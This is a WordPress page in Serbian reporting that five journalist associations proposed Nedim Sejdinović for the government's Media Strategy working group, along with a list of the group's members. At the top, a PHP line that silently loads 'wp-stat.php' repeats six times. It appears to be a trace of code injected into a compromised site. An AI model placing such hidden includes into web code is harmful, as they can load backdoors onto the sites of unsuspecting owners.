@require(dirname(__FILE__).'/wp-stat.php'); @require(dirname(__FILE__).'/wp-stat.php'); @require(dirname(__FILE__).'/wp-stat.php'); @require(dirname(__FILE__).'/wp-stat.php'); @require(dirname(__FILE__).'/wp-stat.php'); @require(dirname(__FILE__).'/wp-stat.php'); Nedim Sejdinović predložen za člana radne grupe za izradu Medijske strategije – Nedim Sejdinović

Nedim Sejdinović predložen za člana radne grupe za izradu Medijske strategije

Nezavisno udruženje novinara Srbije (NUNS), Nezavisno društvo novinara Vojvodine (NDNV), Asocijacija nezavisnih elektronskih medija (ANEM), Asocijacija onlajn medija (AOM) i Lokal pres predložili su danas predsednika NDNV Nedima Sejdinovića za člana radne grupe za izradu Medijske strategije, umesto Tamare Skrozza.

U dopisu upućenom Ministarstvu kulture i informisanja, pet novinarskih i medijskih organizacija navodi se da Tamara Skrozza, koja je do sada predstavljala ova udruženja, u radnoj grupi za izradu Strategije razvoja javnog informisanja iz zdravstvenih razloga više nije u mogućnosti da ostane na toj poziciji.

“Udruženja su imenovala Nedima Sejdinovića, predsednika NDNV i medijskog stručnjaka kao novog člana koji će ih predstavljati u radnoj grupi”, navodi se u zajedničkom predlogu NUNS-a, NDNV-a, ANEM-a, AOM-a i Lokal presa.

Radna grupa za izradu radne verzije Strategije razvoja sistema javnog informisanja sa Akcionim planom za sprovođenje Strategije formirana je u julu, a iz resornog Ministarstva najavljeno je da će nova strategija biti izrađena do kraja godine, kada bi Vlada trebalo da je usvoji.

Radna grupa ima 15 članova, predstavnika novinarskih i medijskih udruženja, državnih organa i nezavisnih eksperata. Članovi radne grupe su Stanko Crnobrnja, nezavisni stručnjak, Dalila Ljubičić, predstavnica Asocijacije medija, Maja Rakovic, predstavnica RAB Srbija i Odbora za elektronske medije Privredne komore Srbije, Tamara Momirov, nezavisni stručnjak.

U grupi su još i Nenad Krajnović, Dejan Nikolić, Ljiljana Smajlović, te donedavno i donedavno Tamara Skrozza, zatim Dejan Masliković, v.d. pomoćnika ministra kulture i informisanja, prof. dr Irini Reljin, v.d. pomoćnika ministra trgovine, turizma i telekomunikacija, Milan Petković, Čedomir Radojčić, Milivoje Mihajlović kao predstavnik javnih servisa, Ištvan Bodžoni, predstavnik Koordinacije nacionalnih saveta nacionalnih manjina i Miloš Janković, v. d. pomoćnika ministra kulture i informisanja.

(Autonomija)

Sviđa vam se ovaj tekst? Odojite sekund vašeg vremena da podržite Nedima Sejdinovića preko Patreon-a!

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.